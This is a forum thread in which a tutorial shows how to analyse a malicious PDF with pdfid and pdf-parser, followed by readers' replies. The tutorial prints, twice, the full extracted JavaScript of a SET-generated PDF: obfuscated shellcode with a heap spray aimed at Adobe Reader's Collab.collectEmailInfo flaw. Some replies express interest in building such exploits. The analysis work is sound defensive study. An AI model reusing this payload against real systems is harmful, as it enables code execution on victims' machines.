EvilZone
Hacking and Security => Tutorials => : Alkapone September 30, 2013, 10:54:30 PM
-
This tutorial is going to teach you how to find malicious data within PDF readers.
I find it pretty cool because instead of writing
strings #filename
gdb
objects
etc etc
You dont need to know all this because there is a tool that simplifies pulling information out of the PDF reader just like almost "grep"
What you will need?
Python Instealled windows or Linux
pdf-reader
pdfid
now im going to write this by myself without having to look up information so if i mess up ill fix it
im just writing this out to see how much of this i remembered.
When you open up a pdf file - PDF incorporated a javascript engine for the PDF reader
which allows the use of executing javascript code.
Malicious Hackers will insert these javascript codes into the objects within a PDF file
and modifying strings and what not
So instead of having
/Javascript
a hacker will turn it into like /jAVAsCRIPT
etc etc
an example output
root@bt:/pentest/forensics/pdfid# python pdfid.py --disarm testfile.pdf
/Open#41#63tion -> /oPEN#61#43TION
/J#61va#53#63r#69#70#74 -> /j#41VA#73#43R#49#50#54
/#4a#53 -> /#6a#73
PDFiD 0.0.11 testfile.pdf
PDF Header: %PDF-1.5
obj 6
endobj 6
stream 1
endstream 1
xref 1
trailer 1
startxref 1
/Page 1(1)
/Encrypt 0
/ObjStm 0
/JS 1(1)
/JavaScript 1(1)
/AA 0
/OpenAction 1(1)
/AcroForm 0
/JBIG2Decode 0
/RichMedia 0
/Launch 0
/Colors > 2^24 0
we can see that there is embedded code within
/JS
/JavaScript
/OpenAction
Notice at the top how Openaction is changed to something else?
Its to obfuscate AntiViruses
Our goal is to pull the javascript code out of the i call them tables or objects however you say it
First command to execute
Disarm the PDF files
python pdfid.py --disarm testfile.pdf
What this does is change the Case Sensitives in the Words to make it somethign else so when you open the .pdf file it is safe and nothing will execute.
the (1) indicates that there is a obfuscation inside that table.
So now you have basic information
Whats obfuscated
But now you need to go in deeper there is a software called
pdf-parser.py
pd-parser is nothing more then like a grep utility on linux just that its made for pulling contents out of the pdf file now.
So now we need to locate the embedded malicious javascript code.
pdf-parser has a grep utility where you can search for certain stuff within the pdf file
so execute this
python pdf-parser.py --search javascript filename.pdf
What this will do is search the contents of the pdf file for anything in relation to javascript
So this is what we get back
obj 5 0
Type: /Action
Referencing: 6 0 R
[(2, '<<'), (2, '/#54#79pe'), (2, '/#41#63#74i#6fn'), (2, '/S'), (2, '/J#61va#53#63r#69#70#74'), (2, '/#4a#53'), (1, ' '), (3, '6'), (1, ' '), (3, '0'), (1, ' '), (3, 'R'), (2, '>>')]
<<
/Type /Action
/S /JavaScript
/JS 6 0 R
>>
Things to note here
1. object is 5
2. It uses javascript
3. As you can see the javascript is encoded but yet --search still found it which is awesome
4. /type Action
So now we know that javascript is included object 5 and is is getting referenced through object 6 as well
So what do we do now?
We pretty much just jump to the next location
Since 5 is referencing 6 and 5 was referenced in in the search for javascript we know that the next
one is going to be holding the javascript code its self
example
python pdf-parser.py --object 5 --filter testfile.pdf
obj 5 0
Type: /Action
Referencing: 6 0 R
[(2, '<<'), (2, '/#54#79pe'), (2, '/#41#63#74i#6fn'), (2, '/S'), (2, '/J#61va#53#63r#69#70#74'), (2, '/#4a#53'), (1, ' '), (3, '6'), (1, ' '), (3, '0'), (1, ' '), (3, 'R'), (2, '>>')]
<<
/Type /Action
/S /JavaScript
/JS 6 0 R
>>
Notice : /JS 6 0 R
So now we know JS is being held in table 6
So now we will filter the jump and paste the javascript code
python pdf-parser.py --object 6 --filter testfile.pdf
obj 6 0
Type:
Referencing:
Contains stream
[(2, '<<'), (2, '/Length'), (1, ' '), (3, '6532'), (2, '/#46ilt#65r'), (2, '['), (2, '/#46#6c#61teDeco#64e'), (2, '/A#53C#49#49He#78Decod#65'), (2, ']'), (2, '>>'), (1, '\r\n')]
<<
/Length 6532
/Filter [
/FlateDecode /ASCIIHexDecode]
>>
And now we finally see the javascript code
>>
'\n\t\tvar ppTeIWbmVyGfyRXaDjrP = unescape("%u67b3%u7b97%u8d05%ueb02%u4076%u0db5%u9f04%uf503%u4299%u14b0%u1da8%u9b3d%u2846%u2cd4%u9849%u4b15%ube24%u197e%u4ff9%ud569%ufc88%u25a9%u3593%u4173%ue086%u273f%u730d%u1840%u89f5%u34e1%u7d37%ue309%uc629%uebc0%ub204%u66b6%ufc80%ubf25%u7224%u7e79%u3f77%u4b78%u2d9f%u747f%u4771%ufd2b%u8db5%u0cb8%u434e%ua942%u979b%u417a%u70b0%u1d3d%u9193%u9215%u14a8%ub390%u3cbb%u7bb4%u214f%ub7f8%u4875%u76b9%u674a%u7cba%u1b05%u11d4%ubed6%u2298%u39e0%u2fe2%ud513%u2c1c%u4696%ub135%u0170%u7beb%u3379%u8cf9%ue1d3%u127a%u49e2%ub699%uf683%u4fe3%u04ba%u25a9%ua83c%ub499%u4bb9%u7515%u7c7e%u0b72%u67f5%u4273%ub8b3%u3f97%u6691%u050c%u2d93%ubfbb%u489b%u8d92%ufc38%u277f%ub73d%u2c71%u370d%u3a9f%u47f9%u1c76%ub2be%ud484%u4996%ub5b1%u8134%u6be0%u4af8%u7443%u9040%ufd30%u7d14%u8735%uc7ff%ud6c1%ud53b%u244e%u9846%u411d%u78b0%u772f%u7f71%ud20a%u76f9%u850c%ue1d1%ub82c%u3270%u74e0%u047e%ud629%ub340%ub9ba%u3d79%ub796%ubb27%u1c99%u8c42%u78e2%u1a15%u24fc%u4e1d%ub02d%u4a05%u9f35%u2a7c%u98f5%u144b%u8d48%u757a%ue309%u340d%u4393%u2567%u9290%ub549%u7791%ueb31%u467d%u3f4f%ub2be%u3772%u6997%u73d4%u7b47%ufd39%ud51a%u66b6%uf819%u3ca9%ubfb4%u9bb1%ua82f%u7e41%u040d%u7d70%u7378%ufc22%u7a74%u970c%u87a8%u1cf9%u7c48%u132f%u7bd5%u4f71%u3479%ub591%u2d9b%u7572%ub84e%ufd6b%uf584%ubbbf%u1d9f%u0243%u32eb%u25e1%u1599%u7614%u7f4b%ue220%ud42b%u4027%u3cb1%ub442%ub0b6%uf785%u66e3%ube92%u9041%u0167%u83d6%u24e0%u4a77%u9305%u4935%u988d%u4637%ub73f%ubab9%u2c47%ufe33%uf8c0%u3db2%ub3a9%u7796%u904f%u2ab8%u93d4%u7641%u3435%u7a7d%uf61b%u66e2%u783f%u2d7b%ub798%u891d%ue3c1%u047f%u0c1c%u05be%u992f%u10ba%u70d5%u497e%u72bf%u6773%u7937%u7174%ud63a%u40b9%u119f%u08eb%u24f5%ub58d%u809b%u86f8%ue1d3%ue038%u3d7c%u9227%u4ba8%u4a47%u0da9%ub048%u183c%ub3f9%u8114%u75fc%ue312%ue130%u7525%u9746%u70b1%ub642%u2377%u91fd%u7db4%u782c%u7c15%u964e%u4373%ub2bb%u7a9f%ue221%ubf4a%u7105%ub54e%u1c7e%u3c7b%u7f93%uf528%u3b91%u41eb%ubb96%u4072%uba34%u3715%u8d0d%u7949%u0425%u46b3%u3db1%u0376%uf9d1%u27be%ud6d2%u0b67%ub2fc%u0ae0%u47f8%u7424%ub714%ub6d5%ub098%u992f%ud448%u6643%ub94f%ub492%ua8b8%u9042%u1d2d%u2c35%u0c3f%u9ba9%ud088%u4bfd%ud997%ud9ec%u2474%ubaf4%u22d3%uf173%u335d%ub1c9%u314f%u1955%uc583%u0304%u1555%ud731%u198f%u183c%uda70%u905e%ueb95%uc64c%u5ede%u8c40%u52b3%uc02b%ue027%ucd59%u4148%u2bd7%u5266%uf3d6%u9024%u8879%uc536%ub159%u18f8%uf698%ud3e5%uafc8%u4162%uc4fc%u5a37%u0afd%ue23c%u2f85%u9783%u313f%u08d4%u7934%u23cc%u5a12%ue0ed%ua641%u8da4%u5cb1%u4437%u9d88%ua809%ua046%u25a5%ue497%ud602%u1ee2%u6b71%ue4f4%ub70b%uf971%u3cac%ud921%u904d%uaab7%u5d42%uf5bc%u6046%u8e11%ue973%u4194%ua9f2%u45b2%u695e%udcdb%udc3a%u3fe4%u81e2%u4b40%ud501%u16f2%u1a4e%ua8c8%u348e%uda5b%u9bbc%u74f7%u548d%u83d1%u4ef2%u1ca5%u710d%u35d5%u25ca%u2d85%u45fb%uae4e%u9004%ufec0%u4baa%uaea0%u3c0a%ua548%u6384%uc668%u124e%u51af%u8db1%udf2e%ucc59%u1e30%u5921%u4ad6%u0c45%ue341%u15fc%u9219%u8001%u3789%u4f93%u3149%uc788%u161e%u1e7e%u8aca%u88d9%u56e8%uf3bf%u8ca8%ufd7c%u4031%ud938%u9c21%u65c1%u7015%u3394%u36c3%uf24e%ue0bd%u5c3d%u7429%u5f0e%u792f%u295b%uc8cf%u6c32%ue5f0%u78d2%u1b89%u8643%u9840%ucd73%u89c8%u881b%u8b99%u2b41%ucf74%ua87f%ub07c%ub07b%ub5f5%u76c0%uc7e6%u1359%u7b08%u3659");\n\t\tvar oYOROBmmCLBEqUdIzZecdOQUpnHsfDjqFomqPgxfpA ="";\n\t\tfor (ZpDrcUftvhGJJVxycpUcbRLZdOLieFkNDxNgAXSUkOBMbSQevHEEhBeyHrClSFmoPA=128;ZpDrcUftvhGJJVxycpUcbRLZdOLieFkNDxNgAXSUkOBMbSQevHEEhBeyHrClSFmoPA>=0;--ZpDrcUftvhGJJVxycpUcbRLZdOLieFkNDxNgAXSUkOBMbSQevHEEhBeyHrClSFmoPA) oYOROBmmCLBEqUdIzZecdOQUpnHsfDjqFomqPgxfpA += unescape("%u8d04%u2f47");\n\t\tNFUCcQtndVUooRHZwATgByhbEuNlleAg = oYOROBmmCLBEqUdIzZecdOQUpnHsfDjqFomqPgxfpA + ppTeIWbmVyGfyRXaDjrP;\n\t\tHyLcEufmamVujjHdLGDMmHRjTyYXdcCWwpbeyuPwUaMjlGVgmSUtccVFvlLdbziuLtkaPKimyGyCRWuNMm = unescape("%u8d04%u2f47");\n\t\tnjvySTXclahLnqDQflAQegEyLrErmpLgRWosdxWCRpDMIvSNXYpieOXbvVcbbFUnQtrgNZmkFuPiTRCKGSylxY = 20;\n\t\tCEXKRrJbAFfpfuIpYYZTzKqBzIARZQmJXbanMCaqmFJSTogxcFL = njvySTXclahLnqDQflAQegEyLrErmpLgRWosdxWCRpDMIvSNXYpieOXbvVcbbFUnQtrgNZmkFuPiTRCKGSylxY+NFUCcQtndVUooRHZwATgByhbEuNlleAg.length\n\t\twhile (HyLcEufmamVujjHdLGDMmHRjTyYXdcCWwpbeyuPwUaMjlGVgmSUtccVFvlLdbziuLtkaPKimyGyCRWuNMm.length<CEXKRrJbAFfpfuIpYYZTzKqBzIARZQmJXbanMCaqmFJSTogxcFL) HyLcEufmamVujjHdLGDMmHRjTyYXdcCWwpbeyuPwUaMjlGVgmSUtccVFvlLdbziuLtkaPKimyGyCRWuNMm+=HyLcEufmamVujjHdLGDMmHRjTyYXdcCWwpbeyuPwUaMjlGVgmSUtccVFvlLdbziuLtkaPKimyGyCRWuNMm;\n\t\tFycriVRmjZpoonOHlGJXpPpUxASUeUAxX = HyLcEufmamVujjHdLGDMmHRjTyYXdcCWwpbeyuPwUaMjlGVgmSUtccVFvlLdbziuLtkaPKimyGyCRWuNMm.substring(0, CEXKRrJbAFfpfuIpYYZTzKqBzIARZQmJXbanMCaqmFJSTogxcFL);\n\t\tmozkkiLgChlruHYGVaDyutYQghwSGSfZRGvTjZqtRrmEFprhxaadUpEEHkE = HyLcEufmamVujjHdLGDMmHRjTyYXdcCWwpbeyuPwUaMjlGVgmSUtccVFvlLdbziuLtkaPKimyGyCRWuNMm.substring(0, HyLcEufmamVujjHdLGDMmHRjTyYXdcCWwpbeyuPwUaMjlGVgmSUtccVFvlLdbziuLtkaPKimyGyCRWuNMm.length-CEXKRrJbAFfpfuIpYYZTzKqBzIARZQmJXbanMCaqmFJSTogxcFL);\n\t\twhile(mozkkiLgChlruHYGVaDyutYQghwSGSfZRGvTjZqtRrmEFprhxaadUpEEHkE.length+CEXKRrJbAFfpfuIpYYZTzKqBzIARZQmJXbanMCaqmFJSTogxcFL < 0x40000) mozkkiLgChlruHYGVaDyutYQghwSGSfZRGvTjZqtRrmEFprhxaadUpEEHkE = mozkkiLgChlruHYGVaDyutYQghwSGSfZRGvTjZqtRrmEFprhxaadUpEEHkE+mozkkiLgChlruHYGVaDyutYQghwSGSfZRGvTjZqtRrmEFprhxaadUpEEHkE+FycriVRmjZpoonOHlGJXpPpUxASUeUAxX;\n\t\tSScAIWbChatkWiATJMxqPJgXabjXwwvNCOjcFJyIHJfmvOrETPV = new Array();\n\t\tfor (sSsVzJpIycEDqyIgEANueREOCklEZbvYdaoCXhYqsmQRoREigNuPaYOlXQHPTUmfMJYfQOMSRwpYbTElpXePdxuPgPKEO=0;sSsVzJpIycEDqyIgEANueREOCklEZbvYdaoCXhYqsmQRoREigNuPaYOlXQHPTUmfMJYfQOMSRwpYbTElpXePdxuPgPKEO<1450;sSsVzJpIycEDqyIgEANueREOCklEZbvYdaoCXhYqsmQRoREigNuPaYOlXQHPTUmfMJYfQOMSRwpYbTElpXePdxuPgPKEO++) SScAIWbChatkWiATJMxqPJgXabjXwwvNCOjcFJyIHJfmvOrETPV[sSsVzJpIycEDqyIgEANueREOCklEZbvYdaoCXhYqsmQRoREigNuPaYOlXQHPTUmfMJYfQOMSRwpYbTElpXePdxuPgPKEO] = mozkkiLgChlruHYGVaDyutYQghwSGSfZRGvTjZqtRrmEFprhxaadUpEEHkE + NFUCcQtndVUooRHZwATgByhbEuNlleAg;\n\t\tvar rOPWhCJLWUylaHpVzPxubxpwfV = unescape("%u0c0c%u0c0c");\n\t\twhile(rOPWhCJLWUylaHpVzPxubxpwfV.length < 0x4000) rOPWhCJLWUylaHpVzPxubxpwfV+=rOPWhCJLWUylaHpVzPxubxpwfV;\n\t\tthis.collabStore = Collab.collectEmailInfo({subj: "",msg: rOPWhCJLWUylaHpVzPxubxpwfV});\n\t\t\t\t\t'
Obviously this is all crowded together but if we want to organize it to show the code a lot better we will type
python pdf-parser.py --object 6 --filter --raw testfile.pdf
The filter and raw will output it in readable format
var ppTeIWbmVyGfyRXaDjrP = unescape("%u67b3%u7b97%u8d05%ueb02%u4076%u0db5%u9f04%uf503%u4299%u14b0%u1da8%u9b3d%u2846%u2cd4%u9849%u4b15%ube24%u197e%u4ff9%ud569%ufc88%u25a9%u3593%u4173%ue086%u273f%u730d%u1840%u89f5%u34e1%u7d37%ue309%uc629%uebc0%ub204%u66b6%ufc80%ubf25%u7224%u7e79%u3f77%u4b78%u2d9f%u747f%u4771%ufd2b%u8db5%u0cb8%u434e%ua942%u979b%u417a%u70b0%u1d3d%u9193%u9215%u14a8%ub390%u3cbb%u7bb4%u214f%ub7f8%u4875%u76b9%u674a%u7cba%u1b05%u11d4%ubed6%u2298%u39e0%u2fe2%ud513%u2c1c%u4696%ub135%u0170%u7beb%u3379%u8cf9%ue1d3%u127a%u49e2%ub699%uf683%u4fe3%u04ba%u25a9%ua83c%ub499%u4bb9%u7515%u7c7e%u0b72%u67f5%u4273%ub8b3%u3f97%u6691%u050c%u2d93%ubfbb%u489b%u8d92%ufc38%u277f%ub73d%u2c71%u370d%u3a9f%u47f9%u1c76%ub2be%ud484%u4996%ub5b1%u8134%u6be0%u4af8%u7443%u9040%ufd30%u7d14%u8735%uc7ff%ud6c1%ud53b%u244e%u9846%u411d%u78b0%u772f%u7f71%ud20a%u76f9%u850c%ue1d1%ub82c%u3270%u74e0%u047e%ud629%ub340%ub9ba%u3d79%ub796%ubb27%u1c99%u8c42%u78e2%u1a15%u24fc%u4e1d%ub02d%u4a05%u9f35%u2a7c%u98f5%u144b%u8d48%u757a%ue309%u340d%u4393%u2567%u9290%ub549%u7791%ueb31%u467d%u3f4f%ub2be%u3772%u6997%u73d4%u7b47%ufd39%ud51a%u66b6%uf819%u3ca9%ubfb4%u9bb1%ua82f%u7e41%u040d%u7d70%u7378%ufc22%u7a74%u970c%u87a8%u1cf9%u7c48%u132f%u7bd5%u4f71%u3479%ub591%u2d9b%u7572%ub84e%ufd6b%uf584%ubbbf%u1d9f%u0243%u32eb%u25e1%u1599%u7614%u7f4b%ue220%ud42b%u4027%u3cb1%ub442%ub0b6%uf785%u66e3%ube92%u9041%u0167%u83d6%u24e0%u4a77%u9305%u4935%u988d%u4637%ub73f%ubab9%u2c47%ufe33%uf8c0%u3db2%ub3a9%u7796%u904f%u2ab8%u93d4%u7641%u3435%u7a7d%uf61b%u66e2%u783f%u2d7b%ub798%u891d%ue3c1%u047f%u0c1c%u05be%u992f%u10ba%u70d5%u497e%u72bf%u6773%u7937%u7174%ud63a%u40b9%u119f%u08eb%u24f5%ub58d%u809b%u86f8%ue1d3%ue038%u3d7c%u9227%u4ba8%u4a47%u0da9%ub048%u183c%ub3f9%u8114%u75fc%ue312%ue130%u7525%u9746%u70b1%ub642%u2377%u91fd%u7db4%u782c%u7c15%u964e%u4373%ub2bb%u7a9f%ue221%ubf4a%u7105%ub54e%u1c7e%u3c7b%u7f93%uf528%u3b91%u41eb%ubb96%u4072%uba34%u3715%u8d0d%u7949%u0425%u46b3%u3db1%u0376%uf9d1%u27be%ud6d2%u0b67%ub2fc%u0ae0%u47f8%u7424%ub714%ub6d5%ub098%u992f%ud448%u6643%ub94f%ub492%ua8b8%u9042%u1d2d%u2c35%u0c3f%u9ba9%ud088%u4bfd%ud997%ud9ec%u2474%ubaf4%u22d3%uf173%u335d%ub1c9%u314f%u1955%uc583%u0304%u1555%ud731%u198f%u183c%uda70%u905e%ueb95%uc64c%u5ede%u8c40%u52b3%uc02b%ue027%ucd59%u4148%u2bd7%u5266%uf3d6%u9024%u8879%uc536%ub159%u18f8%uf698%ud3e5%uafc8%u4162%uc4fc%u5a37%u0afd%ue23c%u2f85%u9783%u313f%u08d4%u7934%u23cc%u5a12%ue0ed%ua641%u8da4%u5cb1%u4437%u9d88%ua809%ua046%u25a5%ue497%ud602%u1ee2%u6b71%ue4f4%ub70b%uf971%u3cac%ud921%u904d%uaab7%u5d42%uf5bc%u6046%u8e11%ue973%u4194%ua9f2%u45b2%u695e%udcdb%udc3a%u3fe4%u81e2%u4b40%ud501%u16f2%u1a4e%ua8c8%u348e%uda5b%u9bbc%u74f7%u548d%u83d1%u4ef2%u1ca5%u710d%u35d5%u25ca%u2d85%u45fb%uae4e%u9004%ufec0%u4baa%uaea0%u3c0a%ua548%u6384%uc668%u124e%u51af%u8db1%udf2e%ucc59%u1e30%u5921%u4ad6%u0c45%ue341%u15fc%u9219%u8001%u3789%u4f93%u3149%uc788%u161e%u1e7e%u8aca%u88d9%u56e8%uf3bf%u8ca8%ufd7c%u4031%ud938%u9c21%u65c1%u7015%u3394%u36c3%uf24e%ue0bd%u5c3d%u7429%u5f0e%u792f%u295b%uc8cf%u6c32%ue5f0%u78d2%u1b89%u8643%u9840%ucd73%u89c8%u881b%u8b99%u2b41%ucf74%ua87f%ub07c%ub07b%ub5f5%u76c0%uc7e6%u1359%u7b08%u3659");
var oYOROBmmCLBEqUdIzZecdOQUpnHsfDjqFomqPgxfpA ="";
for (ZpDrcUftvhGJJVxycpUcbRLZdOLieFkNDxNgAXSUkOBMbSQevHEEhBeyHrClSFmoPA=128;ZpDrcUftvhGJJVxycpUcbRLZdOLieFkNDxNgAXSUkOBMbSQevHEEhBeyHrClSFmoPA>=0;--ZpDrcUftvhGJJVxycpUcbRLZdOLieFkNDxNgAXSUkOBMbSQevHEEhBeyHrClSFmoPA) oYOROBmmCLBEqUdIzZecdOQUpnHsfDjqFomqPgxfpA += unescape("%u8d04%u2f47");
NFUCcQtndVUooRHZwATgByhbEuNlleAg = oYOROBmmCLBEqUdIzZecdOQUpnHsfDjqFomqPgxfpA + ppTeIWbmVyGfyRXaDjrP;
HyLcEufmamVujjHdLGDMmHRjTyYXdcCWwpbeyuPwUaMjlGVgmSUtccVFvlLdbziuLtkaPKimyGyCRWuNMm = unescape("%u8d04%u2f47");
njvySTXclahLnqDQflAQegEyLrErmpLgRWosdxWCRpDMIvSNXYpieOXbvVcbbFUnQtrgNZmkFuPiTRCKGSylxY = 20;
CEXKRrJbAFfpfuIpYYZTzKqBzIARZQmJXbanMCaqmFJSTogxcFL = njvySTXclahLnqDQflAQegEyLrErmpLgRWosdxWCRpDMIvSNXYpieOXbvVcbbFUnQtrgNZmkFuPiTRCKGSylxY+NFUCcQtndVUooRHZwATgByhbEuNlleAg.length
while (HyLcEufmamVujjHdLGDMmHRjTyYXdcCWwpbeyuPwUaMjlGVgmSUtccVFvlLdbziuLtkaPKimyGyCRWuNMm.length<CEXKRrJbAFfpfuIpYYZTzKqBzIARZQmJXbanMCaqmFJSTogxcFL) HyLcEufmamVujjHdLGDMmHRjTyYXdcCWwpbeyuPwUaMjlGVgmSUtccVFvlLdbziuLtkaPKimyGyCRWuNMm+=HyLcEufmamVujjHdLGDMmHRjTyYXdcCWwpbeyuPwUaMjlGVgmSUtccVFvlLdbziuLtkaPKimyGyCRWuNMm;
FycriVRmjZpoonOHlGJXpPpUxASUeUAxX = HyLcEufmamVujjHdLGDMmHRjTyYXdcCWwpbeyuPwUaMjlGVgmSUtccVFvlLdbziuLtkaPKimyGyCRWuNMm.substring(0, CEXKRrJbAFfpfuIpYYZTzKqBzIARZQmJXbanMCaqmFJSTogxcFL);
mozkkiLgChlruHYGVaDyutYQghwSGSfZRGvTjZqtRrmEFprhxaadUpEEHkE = HyLcEufmamVujjHdLGDMmHRjTyYXdcCWwpbeyuPwUaMjlGVgmSUtccVFvlLdbziuLtkaPKimyGyCRWuNMm.substring(0, HyLcEufmamVujjHdLGDMmHRjTyYXdcCWwpbeyuPwUaMjlGVgmSUtccVFvlLdbziuLtkaPKimyGyCRWuNMm.length-CEXKRrJbAFfpfuIpYYZTzKqBzIARZQmJXbanMCaqmFJSTogxcFL);
while(mozkkiLgChlruHYGVaDyutYQghwSGSfZRGvTjZqtRrmEFprhxaadUpEEHkE.length+CEXKRrJbAFfpfuIpYYZTzKqBzIARZQmJXbanMCaqmFJSTogxcFL < 0x40000) mozkkiLgChlruHYGVaDyutYQghwSGSfZRGvTjZqtRrmEFprhxaadUpEEHkE = mozkkiLgChlruHYGVaDyutYQghwSGSfZRGvTjZqtRrmEFprhxaadUpEEHkE+mozkkiLgChlruHYGVaDyutYQghwSGSfZRGvTjZqtRrmEFprhxaadUpEEHkE+FycriVRmjZpoonOHlGJXpPpUxASUeUAxX;
SScAIWbChatkWiATJMxqPJgXabjXwwvNCOjcFJyIHJfmvOrETPV = new Array();
for (sSsVzJpIycEDqyIgEANueREOCklEZbvYdaoCXhYqsmQRoREigNuPaYOlXQHPTUmfMJYfQOMSRwpYbTElpXePdxuPgPKEO=0;sSsVzJpIycEDqyIgEANueREOCklEZbvYdaoCXhYqsmQRoREigNuPaYOlXQHPTUmfMJYfQOMSRwpYbTElpXePdxuPgPKEO<1450;sSsVzJpIycEDqyIgEANueREOCklEZbvYdaoCXhYqsmQRoREigNuPaYOlXQHPTUmfMJYfQOMSRwpYbTElpXePdxuPgPKEO++) SScAIWbChatkWiATJMxqPJgXabjXwwvNCOjcFJyIHJfmvOrETPV[sSsVzJpIycEDqyIgEANueREOCklEZbvYdaoCXhYqsmQRoREigNuPaYOlXQHPTUmfMJYfQOMSRwpYbTElpXePdxuPgPKEO] = mozkkiLgChlruHYGVaDyutYQghwSGSfZRGvTjZqtRrmEFprhxaadUpEEHkE + NFUCcQtndVUooRHZwATgByhbEuNlleAg;
var rOPWhCJLWUylaHpVzPxubxpwfV = unescape("%u0c0c%u0c0c");
while(rOPWhCJLWUylaHpVzPxubxpwfV.length < 0x4000) rOPWhCJLWUylaHpVzPxubxpwfV+=rOPWhCJLWUylaHpVzPxubxpwfV;
this.collabStore = Collab.collectEmailInfo({subj: "",msg: rOPWhCJLWUylaHpVzPxubxpwfV});
Which is now readable
But since this software uses the
/FlateDecode /ASCIIHexDecode]
You have to find a way to de-crypt it
I found a site that helps in analyzing those types of encryptions which can be located at
http://wepawet.cs.ucsb.edu.com (http://wepawet.cs.ucsb.edu.com)
I was using the SET ( Social Engineer Toolkit) to generate a malacious .pdf file
and then i analyzed it over with these tools
Note: Not all malacious pdf files will incorporate that as a encryption method and you may just get lucky
Sometimes there will be and sometimes there wont - There is like 4 other methods for encryption on this
The encrypted javacode you see up there was done by the SET encryption thing
Anyways i hope you learned something from this
And if i wrote this tutorial shitty im sorry
-
You could do something about the text formatting, maybe use bold for the titles etc.
Apart from that I think its a nice share , thanks for contributing :)
+1
-
That's a good tutorial, but I have to agree with proxx. I don't like the numerous empty lines, that looks like you wanted to stretch it or something.
+1 for you
-
I agree, great tutorial.
+1
-
+1 for trying, now format it :)
-
nice share, but the sandbox will block everything malicious in the pdf reader. I had some malicious pdf from 2008's. they dont execute anymore.
Dunno if the sandbox is broken yet.
-
nice share, but the sandbox will block everything malicious in the pdf reader. I had some malicious pdf from 2008's. they dont execute anymore.
Dunno if the sandbox is broken yet.
If you scan it using VirusTotal that service checks for abnormalities and scripts in the document too.
-
Can you send me those pdf's?
And you dont need a sandbox with this
Because you can disarm the javascript in the adobe PDF reader
the command
python pdfid.py --disarm testfile.pdf
Will manually chagne the /Javascript into /J47d7xnsnsScrript
Therefore not allowing the Adobe PDF javascript engine execute
Because in the adobe pdf reader everything is god i cant remember the word
If it has /Javascript /javascript /JS = Those will execute
but /Ja8d7s899 stuff like that will not execute
-
Can you send me those pdf's?
And you dont need a sandbox with this
Because you can disarm the javascript in the adobe PDF reader
the command
python pdfid.py --disarm testfile.pdf
Will manually chagne the /Javascript into /J47d7xnsnsScrript
Therefore not allowing the Adobe PDF javascript engine execute
Because in the adobe pdf reader everything is god i cant remember the word
If it has /Javascript /javascript /JS = Those will execute
but /Ja8d7s899 stuff like that will not execute
I mean that while learning this is fun, the reader sandbox wont let any embeded explot to make changes to the system. So trying to exploit the js is useless now. Unless you have some way to escape sandbox.
-
Great tutorial. Thank you!
-GD
-
i am interested how they make this pdf exploits!
-
Can you send me those pdf's?
And you dont need a sandbox with this
Because you can disarm the javascript in the adobe PDF reader
the command
python pdfid.py --disarm testfile.pdf
Will manually chagne the /Javascript into /J47d7xnsnsScrript
Therefore not allowing the Adobe PDF javascript engine execute
Because in the adobe pdf reader everything is god i cant remember the word
If it has /Javascript /javascript /JS = Those will execute
but /Ja8d7s899 stuff like that will not execute
Seriously, you don't need to start newlines early and double space. I don't understand why people feel the need to attack the Enter button so much. Just let the editor do it on it's own. Otherwise nice contribution n' shit.
-
This post was actually really helpful, I tested this on some SET obfuscated files and it works. I also have to recommend the "Veil Framework" tool for exploitation. 9/10 great post.